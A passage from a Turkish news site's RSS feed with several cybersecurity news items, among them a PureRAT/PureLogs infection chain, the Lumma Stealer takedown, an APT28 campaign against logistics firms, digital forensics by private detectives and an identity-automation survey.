<p data-start="1142" data-end="1487">Bu süreçte 'task.exe', bir diğer çalıştırılabilir dosya olan 'ckcfb.exe'yi aktive ediyor ve ardından 'InstallUtil.exe' isimli sistem yardımcı programını devreye alarak zararlı modülü enjekte ediyor. 'Ckcfb.exe', içerisinde PureRAT zararlısının ana yükünü taşıyan 'Spydgozoi.dll' adlı DLL dosyasını çıkarıyor ve sistem üzerinde kontrol kuruyor.</p>
<p data-start="1489" data-end="1806"><strong data-start="1489" data-end="1525">Kontrol sunucusuna veri aktarımı</strong><br data-start="1525" data-end="1528">PureRAT, uzaktaki komut ve kontrol (C2) sunucusuyla SSL üzerinden bağlantı kuruyor. Sistemde kurulu antivirüs programları, bilgisayar adı ve sistemin çalışma süresi gibi detayları toplayarak sunucuya iletiyor. Bu sayede sunucu, sisteme çeşitli zararlı komutlar gönderebiliyor.</p>
<p data-start="1808" data-end="2039">Kullanılan modüller arasında kendini silme, sistemi yeniden başlatma, açık pencere başlıklarına göre izleme yapma, yetkisiz para transferlerini tetikleme ve panodaki kripto cüzdan adreslerini değiştirme gibi yetenekler bulunuyor.</p>
<p data-start="2041" data-end="2324"><strong data-start="2041" data-end="2074">PureLogs ile bilgi hırsızlığı</strong><br data-start="2074" data-end="2077">Saldırganlar, PureRAT ile birlikte PureLogs adlı bir bilgi hırsızı modülünü de kullanıyor. Bu modül, web tarayıcıları, e-posta istemcileri, parola yöneticileri, kripto cüzdanlar ve FTP yazılımları gibi çok sayıda uygulamadan veri toplayabiliyor.</p>
<p data-start="2326" data-end="2639"><strong data-start="2326" data-end="2365">StilKrip ve Ttcxxewxtly.exe zinciri</strong><br data-start="2365" data-end="2368">PureCrypter olarak bilinen "StilKrip.exe" adlı indirici yazılım da saldırılarda kullanılıyor. Bu yazılım, "Bghwwhmlr.wav" adında bir dosya indirerek zincirin sonraki adımlarını başlatıyor. Nihayetinde, "Ttcxxewxtly.exe" adlı yürütülebilir dosya ile PureLogs yükleniyor.</p>
<p data-start="2641" data-end="2833">Kaspersky, PureRAT ve PureLogs'un birlikte kullanımının, saldırganlara hedef sistem üzerinde tam yetki sağladığını ve hassas kurumsal verilerin tehlikeye girmesine neden olduğunu belirtiyor.</p>
<p data-start="2835" data-end="2973"><strong data-start="2835" data-end="2847"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft 2.300 Alan Adını Ele Geçirdi: Lumma Stealer Ağı Küresel Operasyonla Çökertildi</title>
            <link>https://cumha.com.tr/microsoft-2300-alan-adini-ele-gecirdi-lumma-stealer-agi-kuresel-operasyonla-coekertildi</link>
            <guid>https://cumha.com.tr/microsoft-2300-alan-adini-ele-gecirdi-lumma-stealer-agi-kuresel-operasyonla-coekertildi</guid>
            <description><![CDATA[ Microsoft, Europol ve ABD Adalet Bakanlığı’nın desteğiyle yürütülen kapsamlı bir operasyon sonucu, dünya genelinde 400.000 cihaza bulaşan ve kimlik hırsızlığına neden olan Lumma Stealer isimli kötü amaçlı yazılımın altyapısını çökertti. 2.300’den fazla alan adı ele geçirildi, Lumma ile bağlantılı Telegram hesabı da kapatıldı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682f07496bf3c.webp" length="19692" type="image/webp"/>
            
            <pubDate>Thu, 22 May 2025 14:20:59 +0300</pubDate>
            <dc:creator>Cansu Kırten</dc:creator>
            <media:keywords>Lumma Stealer nedir, kaç alan adı ele geçirildi, hangi kurumlar operasyona katıldı, kullanıcılar kendilerini nasıl koruyabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="468" data-end="471"><strong data-start="471" data-end="520">Microsoft'tan küresel kötü yazılım operasyonu</strong><br data-start="520" data-end="523">Microsoft, ABD Adalet Bakanlığı, Europol ve çeşitli özel sektör siber güvenlik şirketleriyle birlikte yürüttüğü küresel bir operasyonla, Lumma Stealer isimli kötü amaçlı yazılımın altyapısını çökertti. 2022 yılından bu yana yeraltı forumlarında pazarlanan Lumma, siber suçlulara şifre, kredi kartı bilgisi, kripto cüzdan erişimi ve bankacılık kimlik bilgilerini çalma imkânı sunuyordu.</p>
<p></p>
<p data-start="910" data-end="1331"><strong data-start="910" data-end="949">400 binden fazla cihaz hedef alındı</strong><br data-start="949" data-end="952">Lumma Stealer, dünya çapında yaklaşık 400.000 Windows cihazına bulaşarak yaygın kimlik hırsızlığı ve dolandırıcılık faaliyetlerine aracılık etti. Araç; kimlik avı e-postaları, kötü amaçlı reklamlar ve sahte yükleyiciler yoluyla yayılıyordu. Hatta bu yılın başlarında bir kampanyada saldırganlar, Booking.com’un taklidiyle kullanıcıları zararlı dosyaları indirmeye yönlendirmişti.</p>
<p data-start="1333" data-end="1794"><strong data-start="1333" data-end="1375">2.300’den fazla alan adı ele geçirildi</strong><br data-start="1375" data-end="1378">Microsoft’un Dijital Suçlar Birimi (DCU) tarafından yürütülen çalışma sonucunda, Lumma Stealer ile ilişkili 2.300’den fazla alan adı ele geçirildi. ABD'nin Georgia eyaletindeki Kuzey Bölge Mahkemesi’nden alınan karar doğrultusunda yapılan bu müdahaleyle, kötü yazılımın komuta ve kontrol altyapısı devre dışı bırakıldı. Ele geçirilen alan adları, şu anda Microsoft’un kontrolündeki sunuculara yönlendirilmiş durumda.</p>
<p data-start="1796" data-end="2231"><strong data-start="1796" data-end="1842">Lumma Stealer 'abonelik' modeliyle satıldı</strong><br data-start="1842" data-end="1845">Lumma, yalnızca bir kötü yazılım değil, aynı zamanda ticari bir yapıydı. Farklı abonelik paketleriyle satışa sunulan yazılım, temel sürümü için 250 dolardan, tüm kaynak koduna erişim için 20.000 dolara kadar fiyatlandırılıyordu. Yazılımın geliştiricisi olduğu bilinen ve “Shamel” takma adını kullanan kişi, 2023 yılında verdiği bir röportajda 400 aktif müşterisi olduğunu iddia etmişti.</p>
<p data-start="2233" data-end="2629"><strong data-start="2233" data-end="2268">Uluslararası iş birliği vurgusu</strong><br data-start="2268" data-end="2271">Operasyona destek veren kuruluşlar arasında ESET, Cloudflare, Lumen, CleanDNS, BitSight ve GMO Registry gibi önemli siber güvenlik firmaları da yer aldı. Black Duck firmasında görev yapan Altyapı Güvenliği Direktörü Thomas Richards, 'Kolluk kuvvetleri ve özel sektör iş birliğinin ne kadar etkili olabileceğini gösteren bir örnek' değerlendirmesinde bulundu.</p>
<p data-start="2631" data-end="2992"><strong data-start="2631" data-end="2663">Siber tehditler devam ediyor</strong><br data-start="2663" data-end="2666">Uzmanlara göre Lumma operasyonunun başarılı olması, kötü amaçlı yazılımlara karşı savaşın kazanıldığı anlamına gelmiyor. Microsoft, kullanıcıları e-posta eklerine karşı dikkatli olmaya, güvenilir antivirüs çözümleri kullanmaya, sistem güncellemelerini ihmal etmemeye ve çok faktörlü kimlik doğrulamayı etkinleştirmeye çağırdı.</p>
<p data-start="2994" data-end="3137"><strong data-start="2994" data-end="3006"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Rusya’ya bağlı hackerlar NATO ülkelerinin yardım lojistik ağlarını hedef alıyor</title>
            <link>https://cumha.com.tr/rusyaya-bagli-hackerlar-nato-ulkelerinin-yardim-lojistik-aglarini-hedef-aliyor</link>
            <guid>https://cumha.com.tr/rusyaya-bagli-hackerlar-nato-ulkelerinin-yardim-lojistik-aglarini-hedef-aliyor</guid>
            <description><![CDATA[ Rus askeri istihbarat birimine bağlı APT28 adlı hacker grubu, Ukrayna’ya gönderilen yardımların koordinasyonu ve teslimatında görev alan Batılı lojistik ve teknoloji şirketlerine yönelik geniş çaplı bir siber casusluk kampanyası yürütüyor. Kampanya, çok sayıda ülkenin resmi kurumları tarafından ortak açıklamayla ifşa edildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682f0810acf47.webp" length="32110" type="image/webp"/>
            
            <pubDate>Thu, 22 May 2025 14:18:52 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>APT28 hangi ülkeleri hedef aldı, kullanılan saldırı yöntemleri neler, hedeflenen kuruluşlar arasında kimler var, Ukrayna yardımları neden hedefte</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="458" data-end="461"><strong data-start="461" data-end="515">Devlet destekli hacker grubu APT28 yeniden sahnede</strong><br data-start="515" data-end="518">Rusya Genelkurmay Başkanlığı Ana İstihbarat Müdürlüğü'ne (GRU) bağlı 26165 No’lu Askeri Birlik tarafından desteklendiği belirtilen APT28 (diğer adlarıyla BlueDelta, Fancy Bear, Forest Blizzard), Batılı devletlerin Ukrayna’ya sağladığı yardımların koordinasyonu, taşınması ve teslimatına dair bilgileri toplamak amacıyla kapsamlı bir siber casusluk kampanyası başlattı.</p>
<p></p>
<p data-start="888" data-end="1377"><strong data-start="888" data-end="936">Hedefte NATO üyeleri ve lojistik zinciri var</strong><br data-start="936" data-end="939">Avustralya, Kanada, Çekya, Danimarka, Estonya, Fransa, Almanya, Hollanda, Polonya, Birleşik Krallık ve ABD gibi ülkelerin resmi kurumları tarafından yayımlanan ortak uyarıya göre, APT28 özellikle savunma, ulaştırma, denizcilik, hava trafiği yönetimi ve bilgi teknolojileri alanlarında faaliyet gösteren kuruluşları hedef aldı. Etkilenen ülkeler arasında Bulgaristan, Yunanistan, İtalya, Moldova, Romanya, Slovakya ve Ukrayna da bulunuyor.</p>
<p data-start="1379" data-end="1891"><strong data-start="1379" data-end="1447">Saldırı yöntemleri: E-posta açıklarından VPN zafiyetlerine kadar</strong><br data-start="1447" data-end="1450">Kampanyada kullanılan yöntemler arasında parola püskürtme, hedefli kimlik avı saldırıları, Microsoft Exchange sistemlerinde posta kutusu izinlerinin değiştirilmesi, Outlook ve Roundcube gibi e-posta servislerindeki güvenlik açıklarının istismarı öne çıkıyor. Ayrıca kurumsal VPN sistemlerine yönelik SQL enjeksiyonu saldırıları da dikkat çekiyor. Özellikle CVE-2023-23397 ve CVE-2023-38831 gibi kritik zafiyetler üzerinden erişim sağlanıyor.</p>
<p data-start="1893" data-end="2406"><strong data-start="1893" data-end="1938">Tehdit sonrası faaliyetler daha tehlikeli</strong><br data-start="1938" data-end="1941">Saldırganlar sisteme giriş yaptıktan sonra, ulaşım koordinasyonundan sorumlu personeli ve mağdur kuruluşlarla işbirliği yapan şirketleri belirlemeye yönelik keşif çalışmaları yapıyor. İç ağlarda yanal hareket sağlamak için Impacket, PsExec ve RDP gibi araçlar, Active Directory’den bilgi sızdırmak içinse Certipy ve ADExplorer.exe kullanılıyor. Ayrıca Office 365 kullanıcı listelerini çıkarmak ve sürekli e-posta takibi için posta kutusu izinleri manipüle ediliyor.</p>
<p data-start="2408" data-end="2833"><strong data-start="2408" data-end="2455">Fransa ve ESET’ten ayrı ayrı uyarılar geldi</strong><br data-start="2455" data-end="2458">Fransa Dışişleri Bakanlığı, APT28’i 2021’den bu yana ülkenin çeşitli kurumlarına yönelik istikrarsızlaştırıcı siber saldırılar düzenlemekle suçlamıştı. Öte yandan ESET tarafından geçtiğimiz hafta duyurulan Operation RoundPress kapsamında, grup Roundcube, Horde ve Zimbra gibi e-posta servislerini kullanarak Doğu Avrupa, Afrika ve Güney Amerika’daki hükümetleri hedef alıyor.</p>
<p data-start="2835" data-end="3297"><strong data-start="2835" data-end="2868">Gözler internet kameralarında</strong><br data-start="2868" data-end="2871">Ajanslara göre, Rus askeri istihbarat biriminin hedefleri yalnızca dijital sistemlerle sınırlı değil. Ukrayna sınır kapılarındaki internet bağlantılı kameralar da bu izleme faaliyetlerinin bir parçası olarak hedef alınıyor. HeadLace, MASEPIE, OCEANMAP ve STEELHOOK gibi kötü amaçlı yazılım aileleriyle veri sızdırma faaliyetlerinin sürdüğü, verilerin PowerShell komutları ve IMAP protokolü aracılığıyla aktarıldığı bildirildi.</p>
<p data-start="3299" data-end="3461"><strong data-start="3299" data-end="3311"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Sanal Dedektifler Dijital İz Peşinde: Özel Araştırmacılar Siber Delilleri Nasıl Topluyor?</title>
            <link>https://cumha.com.tr/sanal-dedektifler-dijital-iz-pesinde-ozel-arastirmacilar-siber-delilleri-nasil-topluyor</link>
            <guid>https://cumha.com.tr/sanal-dedektifler-dijital-iz-pesinde-ozel-arastirmacilar-siber-delilleri-nasil-topluyor</guid>
            <description><![CDATA[ Siber suçlar, aldatma şüpheleri, veri sızıntıları ya da tehditkar mesajlar… Özel dedektifler artık yalnızca fiziksel gözetimle değil, dijital adli bilişim teknikleriyle de devreye giriyor. Peki telefonlardaki, sosyal medya hesaplarındaki ve hatta silinmiş dosyalardaki sırlar nasıl ortaya çıkıyor? ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682f0779db4c6.webp" length="30500" type="image/webp"/>
            
            <pubDate>Thu, 22 May 2025 14:16:42 +0300</pubDate>
            <dc:creator>Cansu Kırten</dc:creator>
            <media:keywords>Dijital adli bilişim nedir, özel dedektifler bu süreçte hangi araçları kullanır, hangi durumlarda dijital delil toplanır, özel dedektifler yasal sınırlar içinde nasıl hareket eder</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="443" data-end="766"><strong data-start="443" data-end="490">Dijital Verilerin Arasındaki Gerçeği Aramak</strong><br data-start="490" data-end="493">Günümüz dünyasında neredeyse her olayın izi dijital ortamda bir şekilde saklanıyor. Metin mesajları, e-postalar, sosyal medya hareketleri, silinmiş dosyalar… Her biri, çözülmesi gereken bir bilmecenin parçası olabilir. İşte bu noktada devreye dijital adli bilişim giriyor.</p>
<p data-start="768" data-end="1289"><strong data-start="768" data-end="799">Dijital Adli Bilişim Nedir?</strong><br data-start="799" data-end="802">Dijital adli bilişim, elektronik cihazlardan veri toplama, bu verileri analiz etme ve gerektiğinde yasal süreçlerde kullanılabilecek şekilde raporlama sürecidir. Bilgisayarlar, cep telefonları, sabit diskler, bulut depoları ve sosyal medya hesapları gibi dijital kaynaklar analiz edilir. Sadece görünen veriler değil; silinmiş mesajlar, geçmiş konum verileri, tarayıcı geçmişleri ve gizlenmiş dosyalar da bu kapsamda incelenir. Amaç, bu dijital ipuçlarını delil niteliğinde kullanmaktır.</p>
<p data-start="1291" data-end="1813"><strong data-start="1291" data-end="1323">Özel Dedektiflerin Yeni Yüzü</strong><br data-start="1323" data-end="1326">Geçmişin trençkotlu, kamera taşıyan dedektiflerinin yerini artık ekran başında çalışan, karmaşık veri analizleri yapan profesyoneller aldı. Bugünün özel dedektifleri; hukuka uygun şekilde hareket eder, detaylı döküm hazırlar, çevrimiçi davranışları takip eder ve büyük resme odaklanır. Geleneksel kolluk kuvvetlerinden farklı olarak birebir çalışırlar; aldatma vakalarından iş yerindeki veri sızıntılarına, çevrimiçi tehditlerden sahte profillere kadar çok sayıda konuda hizmet verirler.</p>
<p data-start="1815" data-end="1942"><strong data-start="1815" data-end="1874">Dijital Adli İncelemelerin Kullanıldığı Başlıca Alanlar</strong><br data-start="1874" data-end="1877">Bu tür tekniklerin kullanıldığı bazı yaygın senaryolar şunlardır:</p>
<ul data-start="1943" data-end="2287">
<li data-start="1943" data-end="2036">
<p data-start="1945" data-end="2036"><strong data-start="1945" data-end="1973">İlişki ve Aile Davaları:</strong> Aldatma şüphesi, gizli hesaplar, çocukların dijital güvenliği.</p>
</li>
<li data-start="2037" data-end="2125">
<p data-start="2039" data-end="2125"><strong data-start="2039" data-end="2063">İşyeri İncelemeleri:</strong> Gizli veri sızıntıları, şirket cihazlarının kötüye kullanımı.</p>
</li>
<li data-start="2126" data-end="2208">
<p data-start="2128" data-end="2208"><strong data-start="2128" data-end="2145">Siber Suçlar:</strong> Sahte sosyal medya hesapları, tehdit mesajları, dijital takip.</p>
</li>
<li data-start="2209" data-end="2287">
<p data-start="2211" data-end="2287"><strong data-start="2211" data-end="2233">Boşanma Süreçleri:</strong> Gizlenmiş banka hesapları, maddi varlıkların tespiti.</p>
</li>
</ul>
<p data-start="2289" data-end="2369">Bu tür durumlarda dijital veriler, şüpheleri doğrulayan sessiz tanıklar gibidir.</p>
<p data-start="2371" data-end="2500"><strong data-start="2371" data-end="2409">Kullandıkları Araçlar ve Teknikler</strong><br data-start="2409" data-end="2412">Özel dedektiflerin dijital adli incelemelerde kullandığı bazı başlıca araçlar şunlardır:</p>
<ul data-start="2501" data-end="2849">
<li data-start="2501" data-end="2522">
<p data-start="2503" data-end="2522">GPS takip kayıtları</p>
</li>
<li data-start="2523" data-end="2553">
<p data-start="2525" data-end="2553">Sosyal medya analiz araçları</p>
</li>
<li data-start="2554" data-end="2584">
<p data-start="2556" data-end="2584">Adli görüntüleme yazılımları</p>
</li>
<li data-start="2585" data-end="2622">
<p data-start="2587" data-end="2622">Silinmiş dosya kurtarma programları</p>
</li>
<li data-start="2623" data-end="2849">
<p data-start="2625" data-end="2849">Anahtar kelime tarama sistemleri<br data-start="2657" data-end="2660">Bazı uzmanlar yapay zeka destekli yüz tanıma yazılımları ya da deepfake analiz sistemleri de kullanabilir. Ancak bu araçlar doğru şekilde kullanılmadığında hukuki geçerliliğini yitirebilir.</p>
</li>
</ul>
<p data-start="2851" data-end="2963"><strong data-start="2851" data-end="2895">Adım Adım Dijital Adli Soruşturma Süreci</strong><br data-start="2895" data-end="2898">Bir dijital adli inceleme süreci genellikle şu adımlarla ilerler:</p>
<ol data-start="2964" data-end="3374">
<li data-start="2964" data-end="3036">
<p data-start="2967" data-end="3036"><strong data-start="2967" data-end="2983">İlk danışma:</strong> Olay hakkında bilgi toplanır ve hedefler belirlenir.</p>
</li>
<li data-start="3037" data-end="3109">
<p data-start="3040" data-end="3109"><strong data-start="3040" data-end="3062">Cihazların temini:</strong> İlgili cihazlara yasal izinle erişim sağlanır.</p>
</li>
<li data-start="3110" data-end="3190">
<p data-start="3113" data-end="3190"><strong data-start="3113" data-end="3132">Veri yedekleme:</strong> Orijinal veriye zarar verilmeden birebir kopyalar alınır.</p>
</li>
<li data-start="3191" data-end="3279">
<p data-start="3194" data-end="3279"><strong data-start="3194" data-end="3205">Analiz:</strong> Mesajlar, geçmiş kayıtları, silinmiş içerikler ve daha fazlası incelenir.</p>
</li>
<li data-start="3280" data-end="3374">
<p data-start="3283" data-end="3374"><strong data-start="3283" data-end="3297">Raporlama:</strong> Tüm bulgular zaman damgası ve görsellerle birlikte rapor haline getirilir.</p>
</li>
</ol>
<p data-start="3376" data-end="3770"><strong data-start="3376" data-end="3422">Yasal Sınırlar İçinde Kalmak Neden Önemli?</strong><br data-start="3422" data-end="3425">Bu alanda çalışan uzmanlar, yasal sınırların dışına çıkmadan veri toplamaya özen gösterir. Özel dedektifler; kişisel gizlilik yasalarına uyar, cihazlara yalnızca yazılı izinle erişir, yetkisiz takip veya dinleme işlemlerinden kaçınır ve her adımı belgelendirir. Aksi halde elde edilen veriler hem geçersiz sayılır hem de yasal sorun doğurabilir.</p>
<p data-start="3772" data-end="4179"><strong data-start="3772" data-end="3806">Neden Profesyonel Yardım Şart?</strong><br data-start="3806" data-end="3809">Her ne kadar teknolojiye hakim bireyler kendi araştırmalarını yapabileceğini düşünse de, dijital adli bilişim uzmanları hem teknik bilgiye hem de hukuk bilgisine sahiptir. Bilgilerin yanlışlıkla silinmesi, sürecin geçersiz hale gelmesi gibi riskleri ortadan kaldırırlar. Bu nedenle özel dedektif desteği, çoğu zaman sürecin güvenli ve yasal şekilde yürütülmesini sağlar.</p>
<p data-start="4181" data-end="4377"><strong data-start="4181" data-end="4193"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>FBI ve Europol'den küresel siber operasyon: 10 milyon cihazı etkileyen Lumma Stealer ağı çökertildi</title>
            <link>https://cumha.com.tr/fbi-ve-europolden-kuresel-siber-operasyon-10-milyon-cihazi-etkileyen-lumma-stealer-agi-coekertildi</link>
            <guid>https://cumha.com.tr/fbi-ve-europolden-kuresel-siber-operasyon-10-milyon-cihazi-etkileyen-lumma-stealer-agi-coekertildi</guid>
            <description><![CDATA[ ABD Adalet Bakanlığı, FBI, Europol ve özel sektör iş birliğiyle yürütülen operasyon sonucu 2.300 komuta kontrol alan adı ele geçirildi. Lumma Stealer isimli kötü amaçlı yazılım, dünya genelinde milyonlarca bilgisayarı hedef alarak kritik bilgileri çalıyordu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682f0708ce4b6.webp" length="34480" type="image/webp"/>
            
            <pubDate>Thu, 22 May 2025 14:14:32 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>Lumma Stealer nedir, kaç cihaza bulaştı, FBI ve Europol operasyonu ne zaman düzenledi, geliştiricisinin kimliği ne</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="412" data-end="415"><strong data-start="415" data-end="474">10 milyon cihazı etkileyen zararlı yazılıma büyük darbe</strong><br data-start="474" data-end="477">ABD Federal Soruşturma Bürosu (FBI), Europol ve çok sayıda özel sektör siber güvenlik firmasının koordineli çalışması sonucu, Lumma (diğer adıyla LummaC veya LummaC2) isimli bilgi çalan kötü amaçlı yazılımın dijital altyapısı çökertildi. Operasyon kapsamında 2.300 alan adı ele geçirilerek Lumma'nın komuta ve kontrol ağı devre dışı bırakıldı.</p>
<p></p>
<p data-start="822" data-end="1195"><strong data-start="822" data-end="877">Hedef: Şifreler, kripto paralar ve kişisel bilgiler</strong><br data-start="877" data-end="880">ABD Adalet Bakanlığı tarafından yapılan açıklamada, Lumma gibi kötü amaçlı yazılımların milyonlarca kullanıcının oturum bilgilerini çalarak banka dolandırıcılığı ve kripto para hırsızlığı gibi suçlarda kullanıldığı belirtildi. Sadece FBI, Lumma yazılımının 10 milyondan fazla enfeksiyona neden olduğunu tespit etti.</p>
<p data-start="1197" data-end="1603"><strong data-start="1197" data-end="1247">Microsoft 394 binden fazla bulaşma tespit etti</strong><br data-start="1247" data-end="1250">Europol, 16 Mart ile 16 Mayıs 2025 tarihleri arasında Microsoft’un dünya genelinde 394.000 Windows bilgisayarın Lumma ile enfekte olduğunu belirlediğini aktardı. Operasyonun, kötü amaçlı yazılım ile kullanıcılar arasındaki iletişimi tamamen kestiği vurgulandı. Lumma, Europol tarafından ‘dünyanın en büyük bilgi çalan yazılım tehdidi’ olarak tanımlandı.</p>
<p data-start="1605" data-end="2090"><strong data-start="1605" data-end="1635">Arkasındaki isim: 'Shamel'</strong><br data-start="1635" data-end="1638">Microsoft Dijital Suçlar Birimi (DCU), ESET, BitSight, Lumen, Cloudflare, CleanDNS ve GMO Registry gibi firmalarla iş birliği yaptı. Lumma’nın geliştiricisinin 'Shamel' takma adını kullanan Rus bir kişi olduğu, Telegram gibi platformlarda yazılımı farklı seviyelerde hizmet paketleriyle pazarladığı tespit edildi. Yazılımın fiyatları 250 dolardan başlayıp 20.000 dolara kadar çıkıyor. En pahalı paket, kaynak kod erişimi ve yeniden satış hakkı sunuyor.</p>
<p data-start="2092" data-end="2551"><strong data-start="2092" data-end="2142">Sürekli evrilen altyapı ve gizlenme teknikleri</strong><br data-start="2142" data-end="2145">ESET, yazılımın farklı kullanıcılar için özelleştirilebilir yapıda olduğunu, gelişmiş tespit önleme sistemlerine ve sahte yazılım paketleriyle yayılma stratejilerine sahip olduğunu belirtti. Lumma, genellikle sahte yazılım indirme siteleri, tıklama tuzakları ve reklam ağları aracılığıyla yayılıyor. Microsoft, yazılımın yayılmasında Prometheus gibi trafik dağıtım sistemlerinin kullanıldığını da açıkladı.</p>
<p data-start="2553" data-end="2945"><strong data-start="2553" data-end="2593">Cloudflare: İş yapamaz hale geldiler</strong><br data-start="2593" data-end="2596">Cloudflare, kötü niyetli alan adlarına bir uyarı sayfası yerleştirildiğini ve bu alan adlarını kontrol eden hesaplara karşı da işlem başlatıldığını açıkladı. Cloudforce One yetkilisi Blake Darché, yapılan müdahaleyle Lumma operatörlerinin para kazanma yeteneklerinin engellendiğini ve operasyonlarının ciddi şekilde sekteye uğratıldığını ifade etti.</p>
<p data-start="2947" data-end="3266"><strong data-start="2947" data-end="2974">Geri dönmeleri muhtemel</strong><br data-start="2974" data-end="2977">Uzmanlar, Lumma operasyonunun büyük oranda sekteye uğratıldığını ancak tehdit aktörlerinin taktik değiştirerek yeniden faaliyet göstermeye çalışacaklarını belirtiyor. Lumma geliştiricisi Ocak 2025’te yaptığı açıklamada, sonbaharda operasyonlarını sonlandırmayı planladıklarını belirtmişti.</p>
<p data-start="3268" data-end="3401"><strong data-start="3268" data-end="3280"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Kimlik güvenliğinde otomasyon krizi: Her 10 şirketten 9'u hâlâ manuel yöntemlere güveniyor</title>
            <link>https://cumha.com.tr/kimlik-guvenliginde-otomasyon-krizi-her-10-sirketten-9u-hala-manuel-yoentemlere-guveniyor</link>
            <guid>https://cumha.com.tr/kimlik-guvenliginde-otomasyon-krizi-her-10-sirketten-9u-hala-manuel-yoentemlere-guveniyor</guid>
            <description><![CDATA[ Cerby&#039;nin 500&#039;den fazla IT ve güvenlik yöneticisiyle gerçekleştirdiği araştırmaya göre, şirketlerin sadece %4&#039;ü kimlik yönetim süreçlerini tamamen otomatik hale getirebildi. MFA etkinleştirme, şifre güncelleme ve erişim iptali gibi kritik işlemler hâlâ büyük ölçüde insan hatasına dayalı yürütülüyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202505/image_870x_682f06c7712bb.webp" length="84296" type="image/webp"/>
            
            <pubDate>Thu, 22 May 2025 14:13:30 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>Kimlik güvenliğinde otomasyon eksikliği neden tehlikeli, şirketler MFA&#039;yı neden zorunlu hale getiremiyor, manuel erişim iptali ne gibi riskler yaratıyor, yapay zekâ otomasyonu nasıl destekleyebilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="443" data-end="446"><strong data-start="446" data-end="523">Yeni araştırma kimlik güvenliğindeki otomasyon açığını gözler önüne serdi</strong><br data-start="523" data-end="526">Cerby tarafından yayımlanan ‘2025 Kimlik Otomasyonu Açığı’ başlıklı rapor, 500'den fazla IT ve güvenlik yöneticisinin katılımıyla oluşturuldu. Araştırma, şirketlerin kimlik güvenliği süreçlerinde hâlâ büyük oranda manuel işlemlere dayandığını ortaya koydu.</p>
<p></p>
<p data-start="784" data-end="1211"><strong data-start="784" data-end="828">Manuel süreçler güvenlik zaafı yaratıyor</strong><br data-start="828" data-end="831">Kurumlar, kimlik güvenliği konusunda kâğıt üzerinde yeterli görünse de gerçekler farklı. Çok faktörlü kimlik doğrulama (MFA) etkinleştirme, şifrelerin güvenli biçimde saklanması ve eski çalışanların sistemden çıkarılması gibi işlemlerin büyük bölümü hâlâ manuel olarak yürütülüyor. Cerby'nin araştırmasına göre, yalnızca %4’lük bir kesim bu süreçleri tamamen otomatikleştirebildi.</p>
<p data-start="1213" data-end="1678"><strong data-start="1213" data-end="1274">İnsan hatası en büyük risklerden biri olmaya devam ediyor</strong><br data-start="1274" data-end="1277">Verizon’un 2025 Veri İhlali Raporu'na göre, güvenlik ihlallerinin %60'ında insan faktörü yer aldı. Cerby’nin verileri de bu tabloyu destekliyor: Şirketlerin %41’i şifreleri hâlâ e-posta ve elektronik tablolar gibi güvenli olmayan yöntemlerle güncelliyor. %89’luk kesim ise MFA işlemlerini kullanıcıların manuel olarak devreye almasını bekliyor. Bu da saldırganlar için ciddi bir açık anlamına geliyor.</p>
<p data-start="1680" data-end="2080"><strong data-start="1680" data-end="1721">Erişim yönetimi hâlâ manuel ilerliyor</strong><br data-start="1721" data-end="1724">Şirketlerin %59’u, kullanıcı erişimlerinin başlatılması ve sonlandırılması işlemlerini manuel olarak sürdürüyor. Bu da biletleme sistemlerine ya da sözlü takiplere dayanarak ilerleyen yavaş, dağınık ve güvenlik açıklarına açık bir yapı oluşturuyor. Ponemon Enstitüsü'nün verilerine göre, şirketlerin %52’si manuel işlemler nedeniyle güvenlik ihlali yaşadı.</p>
<p data-start="2082" data-end="2435"><strong data-start="2082" data-end="2119">Otomasyon açığı neden kapanmıyor?</strong><br data-start="2119" data-end="2122">Araştırmaya göre, uygulama yığını hızla büyürken altyapı dağınık kaldı. Şirketlerin kullandığı birçok uygulama, modern kimlik standartlarıyla entegre olamıyor. Bu da geçici çözümler ve manuel müdahaleleri kalıcı hale getiriyor. Parola yöneticileri ve komut dosyaları gibi araçlar ise sürdürülebilir olmaktan uzak.</p>
<p data-start="2437" data-end="2711"><strong data-start="2437" data-end="2476">Yapay zekâ destekli çözümler kapıda</strong><br data-start="2476" data-end="2479">Cerby, otomasyon açığını kapatmak için yapay zekâ destekli hibrit çözümler öneriyor. Güvenlik liderlerinin %78’i yapay zekânın tüm süreci tek başına devralmasına henüz güvenmese de %45’i insan destekli otomasyon modelini benimsiyor.</p>
<p data-start="2713" data-end="2927"><strong data-start="2713" data-end="2725"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Milyonlarca iPhone cihazı riskte: 'AirPlay açığı hackerlara kapı aralıyor'</title>
            <link>https://cumha.com.tr/milyonlarca-iphone-cihazi-riskte-airplay-acigi-hackerlara-kapi-araliyor</link>
            <guid>https://cumha.com.tr/milyonlarca-iphone-cihazi-riskte-airplay-acigi-hackerlara-kapi-araliyor</guid>
